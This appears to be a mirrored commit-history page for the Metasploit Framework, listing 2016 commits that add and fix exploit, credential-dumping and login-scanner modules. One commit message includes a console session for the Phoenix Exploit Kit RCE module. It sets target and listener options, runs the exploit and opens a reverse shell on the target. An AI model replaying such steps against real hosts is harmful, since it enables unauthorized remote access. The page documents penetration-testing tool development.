infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
39,400 Commits
7 Branches
556 Tags
419 MiB
Commit Graph

20674 Commits (ed5bbb9885485a2197fb71e590d303d3b275ecee)

Author SHA1 Message Date
wchen-r7 ed5bbb9885
Land #7284, Add SugarCRM REST PHP Object Injection exploit 2016-09-13 15:46:46 -05:00
wchen-r7 a0095ad809 Check res properly and update Ruby syntax 
If res is nil, it should not be doing res.code
 2016-09-13 15:45:57 -05:00
nixawk 1ce9aedb97 parenthesis for condition expression 2016-09-13 03:37:47 -05:00
nixawk fd16c1c3b7 Fix issue-7295 2016-09-13 01:32:20 -05:00
scriptjunkie a0e05d4c4c
Land #7287, mdaemon cred dumper 2016-09-10 08:43:07 -05:00
Brent Cook a81f351cb3
Land #7274, Remove deprecated modules 2016-09-09 12:01:59 -05:00
Brent Cook 1d4b0de560
Land #6616, Added an Outlook EWS NTLM login module. 2016-09-09 11:43:52 -05:00
Agora Security 00f09d19b1 SMTP Typo 
Correct SMTP Type (before SMPT)
 2016-09-09 01:36:37 -05:00
William Vu 92dba8ff9d
Land #7290, env var check for WinSCP module 2016-09-07 21:08:12 -05:00
Brendan a30711ddcd
Land #7279, Use the rubyntlm gem (again) 2016-09-07 16:33:35 -05:00
wchen-r7 a9c3c5d391 Fix typos 2016-09-07 15:40:10 -05:00
wchen-r7 831c7a08a8 Check environment variables before using for winscp module 2016-09-07 15:24:22 -05:00
William Vu 7d44bd5ba4 Clean up module 2016-09-06 23:30:58 -05:00
aushack 015b790295 Added default rport. 2016-09-07 14:24:07 +10:00
aushack 7632c74aba Merge branch 'master' of https://github.com/rapid7/metasploit-framework 2016-09-07 14:15:57 +10:00
aushack 6e21684ff7 Fix typo. 2016-09-07 14:08:46 +10:00
EgiX df5fdbff41 Add module for KIS-2016-07: SugarCRM REST PHP Object Injection 
This PR contains a module to exploit KIS-2016-07, a PHP Object Injection vulnerability in SugarCRM CE before version 6.5.24 that allows unauthenticated users to execute arbitrary PHP code with the permissions of the webserver. Successful exploitation of this vulnerability should require SugarCRM to be running on PHP before version 5.6.25 or 7.0.10, which fix CVE-2016-7124.
 2016-09-07 01:58:41 +02:00
William Vu fed2ed444f Remove deprecated modules 
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
 2016-09-03 12:43:01 -05:00
Brendan 81bc6bd672
Land #7228, Create zabbix_toggleids_sqli auxiliary module 2016-09-01 16:33:17 -05:00
Jon Hart b0e45341e5
Update redis file_upload to optionally FLUSHALL before writing 
This increases the chances that the uploaded file will be usable as-is
rather than being surround by the data in redis itself.
 2016-08-31 14:27:18 -07:00
Brandon Perry 874fec4e31 Update zabbix_toggleids_sqli.rb 2016-08-31 17:23:16 -04:00
Brandon Perry d43380330e Update zabbix_toggleids_sqli.rb 2016-08-31 17:18:28 -04:00
AgoraSecurity d65ca818ea Add validation of session type 2016-08-31 11:29:04 -05:00
AgoraSecurity ce7d4cf7f7 Removed "shell" from SessionTypes 
Remove the need to check for the session type manually. It will be automatically validated at the time of module run.
 2016-08-31 00:12:31 -05:00
AgoraSecurity 401044ee43 Fix error when saving creds 2016-08-30 16:49:31 -05:00
William Vu e403df57e0
Land #7251, CPORT fix for smb_login 2016-08-30 00:52:22 -05:00
William Vu ea7721608b
Land #7248, CredEnumerateA fix for enum_cred_store 2016-08-29 15:12:23 -05:00
William Vu 43a9b2fa26
Fix missing return 
My bad.
 2016-08-29 14:13:18 -05:00
William Vu d50a6408ea
Fix missed Twitter handle 2016-08-29 13:46:26 -05:00
William Vu f8fa090ec0
Fix one more missed comma 2016-08-29 13:40:55 -05:00
William Vu 53516d3323
Fix #7220, phoenix_exec module cleanup 2016-08-29 13:28:15 -05:00
Brendan b21ea2ba3f Added code to assign CPORT value to the parent scanner object 2016-08-29 13:17:10 -05:00
Brendan bc6a529388 Added some error checking to CredEnuerateA() railgun call 2016-08-26 16:21:54 -05:00
Pearce Barry 226ded8d7e
Land #6921, Support basic and form auth at the same time 2016-08-25 16:31:26 -05:00
wchen-r7 52b81f32b1
Land #7238, Add DETECT_ANY_AUTH to smb_login 2016-08-25 11:52:14 -05:00
Louis Sato 4a6b2ef8de
fixing typo for reference for golden ticket 2016-08-24 10:55:36 -05:00
Brendan 83160b7e49
Land #7173, Add post module to compress (zip) a file or directory 2016-08-24 09:38:04 -05:00
William Vu cd858a149f Add DETECT_ANY_AUTH to make bogus login optional 2016-08-23 23:05:47 -05:00
wchen-r7 89c3b6f399 Remove the -d flag for Linux machines 2016-08-23 18:43:50 -05:00
Pearce Barry 03e14ec86f
Land #7232, Net::SSH Regression Fixes 
Fixes #7160
Fixes #7175
Fixes #7229
 2016-08-23 14:53:42 -05:00
Brandon Perry 38a8d21e5b Update zabbix_toggleids_sqli.rb 2016-08-22 18:57:25 -05:00
Brandon Perry 6b9635d7a5 Rename zabbix_toggleids_sqli to zabbix_toggleids_sqli.rb 2016-08-22 18:52:16 -05:00
David Maloney 20947cd6cd
remove old dependency on net-ssh moneykpatch 
the ssh_login_pubkey scanner relied on functionality that
was monkeypatched into our vendored copy. this was an uneeded solution
in the first palce, and we now use a more sane method of accomplishing
the same thing
 2016-08-22 10:54:09 -05:00
Brandon Perry 2abf71a3ac Create zabbix_toggleids_sqli 2016-08-21 12:43:20 -05:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00